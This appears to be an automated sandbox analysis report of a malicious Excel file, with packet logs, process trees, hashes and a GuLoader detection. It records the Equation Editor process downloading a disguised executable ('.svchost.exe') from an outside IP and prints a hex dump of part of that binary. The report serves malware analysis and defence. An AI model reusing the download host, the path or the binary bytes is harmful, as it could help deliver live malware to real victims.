Jul 22, 2021 14:03:06.860831976 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860848904 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.860863924 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860872030 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.860893011 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860912085 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.860922098 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860932112 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.860953093 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860975981 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.860982895 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.860994101 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861017942 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861022949 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861056089 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861066103 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861087084 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861095905 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861118078 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861128092 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861145020 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861149073 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861179113 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861207962 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861217022 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861237049 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861237049 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861274958 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861279011 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861309052 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:06.861320019 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861334085 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.861366987 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:06.869780064 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.104054928 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.104091883 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.104126930 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.104157925 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.104185104 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.104222059 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.104255915 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.104293108 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.104335070 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.104383945 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.107834101 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108160973 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108287096 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108293056 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108356953 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108382940 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108437061 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108450890 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108479023 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108490944 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108537912 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108544111 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108594894 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108597994 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108640909 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108650923 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108691931 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108705997 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108752966 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108805895 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108860016 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108870983 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108900070 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.108911037 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.108973980 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109030962 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109050989 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109082937 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109136105 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109154940 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109189987 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109190941 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109240055 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109240055 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109287977 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109287977 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109338045 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109340906 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109390974 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109394073 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109443903 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109460115 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109481096 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109489918 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109532118 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109536886 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109577894 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109582901 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109626055 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109628916 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109675884 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109678984 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109723091 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109726906 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109772921 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109786034 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109833956 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109838963 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109883070 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109889030 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109927893 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109937906 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.109982014 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.109987974 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.110033989 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.110034943 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.110076904 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.110085011 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.110126019 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.110136032 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.110182047 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.110196114 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.110236883 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.110248089 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.110296965 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.112257957 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.117480993 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.117512941 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.117575884 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.126578093 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.349627018 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349654913 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349668980 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349684954 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349700928 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349715948 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349731922 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349747896 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349767923 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349786997 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349802017 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349817991 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349833012 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349843025 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.349848032 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349864006 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.349961042 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355618000 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355657101 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355691910 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355706930 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355715990 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355731010 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355748892 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355756044 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355760098 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355781078 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355789900 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355803013 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355813026 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355825901 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355838060 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355849028 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355858088 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355870962 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355884075 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355895042 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355902910 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355916977 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355932951 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355941057 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355948925 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355964899 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355972052 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.355986118 CEST	80	49167	180.214.239.39	192.168.2.22
Jul 22, 2021 14:03:07.355993986 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.356017113 CEST	49167	80	192.168.2.22	180.214.239.39
Jul 22, 2021 14:03:07.884804010 CEST	49167	80	192.168.2.22	180.214.239.39

HTTP Request Dependency Graph

180.214.239.39

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	180.214.239.39	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:03:05.622628927 CEST	0	OUT	GET /process/.svchost.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 180.214.239.39 Connection: Keep-Alive
Jul 22, 2021 14:03:05.870244980 CEST	1	IN	HTTP/1.1 200 OK Date: Thu, 22 Jul 2021 11:50:59 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Wed, 21 Jul 2021 22:37:17 GMT ETag: "3c468-5c7a9d0090119" Accept-Ranges: bytes Content-Length: 246888 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 b6 5c 53 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 19 f9 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 30 03 00 28 00 00 00 00 50 03 00 c4 54 00 00 00 00 00 00 00 00 00 00 58 b0 03 00 10 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPEL\S0p0@@t0(PTX( .text$0 `.data@@@.rsrcTP`P@@IMSVBVM60.DLL
Jul 22, 2021 14:03:05.870277882 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:03:05.870312929 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:03:05.870343924 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:03:06.118174076 CEST	7	IN	Data Raw: a9 51 d1 f1 a8 d6 5f 3a 4f ad 33 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f db 02 00 7f 4f 00 00 00 04 00 6f 76 65 72 00 0d 01 09 00 54 61 67 Data Ascii: Q_:O3f`OoverTagkamresB"#6Olt.O00h (00 f$h.+
Jul 22, 2021 14:03:06.118226051 CEST	8	IN	Data Raw: bb bb b0 00 00 00 00 00 33 88 33 bb bb b0 00 00 00 00 00 00 00 8b bb bb bb bb bb 00 00 00 00 00 77 88 83 3b bb b0 00 00 00 00 00 00 00 0b bb bb bb bb bb 80 00 00 00 0b 78 88 83 3b bb 00 00 00 00 00 00 00 00 00 8b bb bb bb bb b0 00 00 00 8b 88 88 Data Ascii: 33w;x;s?
Jul 22, 2021 14:03:06.118263960 CEST	10	IN	Data Raw: 00 00 00 18 00 00 00 30 00 00 00 01 00 04 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 Data Ascii: 0
Jul 22, 2021 14:03:06.118300915 CEST	11	IN	Data Raw: 00 4e e8 fb 00 4e e8 fc 00 56 e5 f1 00 59 e5 f0 00 5d e5 f2 00 58 e5 fb 00 5e e6 fb 00 50 e9 fc 00 56 e9 fd 00 5d e9 fc 00 62 e1 f7 00 66 e2 f6 00 63 e5 fa 00 6b ea fb 00 69 ea fc 00 7b e2 f6 00 79 e8 f2 00 72 e2 fb 00 78 e3 fb 00 7e e5 fb 00 74 Data Ascii: NNVY]X^PV]bfcki{yrx~tsvq{}
Jul 22, 2021 14:03:06.118336916 CEST	12	IN	Data Raw: 4b 4b 2b 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4b 4b 4b 4b 4b 4b 4b 4f 4f 51 45 25 22 00 00 00 00 00 00 4f 4b 4b 4b 4b 4b 4b 4b 4b 4b 4b 4b 2b 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4b 4b 4b 4b 4b 4b 51 51 51 51 4b 25 18 00 00 Data Ascii: KK+KKKKKKKOOQE%"OKKKKKKKKKKK+KKKKKKQQQQK%KKKKKKKKKKKO%KKKKKQQQQQQ%KKKKKKKKKQQQ%KKKOQQQQQQQ%KKKKKKKOQQQQ%KOQQQQQQQQQ+KKKKKKOQQQQQ%
Jul 22, 2021 14:03:06.118376017 CEST	14	IN	Data Raw: 00 00 00 00 00 00 00 00 8a 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 5a 2d 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 88 88 88 88 88 88 88 88 88 88 88 7f 51 41 67 00 00 00 00 00 00 00 00 Data Ascii: Z-<QAg?????
Jul 22, 2021 14:03:06.118415117 CEST	15	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2368 Parent PID: 584

General

Start time:	14:02:56
Start date:	22/07/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fcf0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2124 Parent PID: 584

General

Start time:	14:03:17
Start date:	22/07/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2192 Parent PID: 2124

General

Start time:	14:03:20
Start date:	22/07/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	246888 bytes
MD5 hash:	C937FC9ED4325E6AB24D49A3175F3A5C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 43%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2192 Parent PID: 2124 vbc.exeCOMMON

Executed Functions

Function 002E543B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 002E560C

Strings

Nn!v, xrefs: 002E54CD
Nn!v, xrefs: 002E54D2

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: Nn!v$Nn!v
API String ID: 2167126740-3115524940
Opcode ID: 015e8b0abd7920c631aa7676a07db578ad2d505ebb8099d48650eee19db3ed0f
Instruction ID: 2c3f3cc94051c4e068c787021ee2c362c6340f140e0fca955a7db0c9237dc687
Opcode Fuzzy Hash: 015e8b0abd7920c631aa7676a07db578ad2d505ebb8099d48650eee19db3ed0f
Instruction Fuzzy Hash: 645134B5A143999FDF709E64D8947CB77A1FF1A350FD5442ADC88EB301D3308A858B42

Uniqueness

Uniqueness Score: -1.00%

Function 002E5540, Relevance: 1.6, APIs: 1, Instructions: 99memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 002E560C

Memory Dump Source

Source File: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e8bdcfc275e6778364334c2fb4197cbf67d1acc3f4010fbc314a5eac5104f51f
Instruction ID: 6e5a0e5631e050ff922381e8dd4cbaea45c11f639a0f2a9dd809dcacd6752aa3
Opcode Fuzzy Hash: e8bdcfc275e6778364334c2fb4197cbf67d1acc3f4010fbc314a5eac5104f51f
Instruction Fuzzy Hash: 6F31F4746583888FDB219F65CCA07EA7FB1FF4A354F58456DDC898B202C370AA51CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00430BE4, Relevance: 221.8, APIs: 116, Strings: 10, Instructions: 1298COMMON

Download Yara Rule

APIs

__vbaStrToAnsi.MSVBVM60(?,spearproof), ref: 00430D23
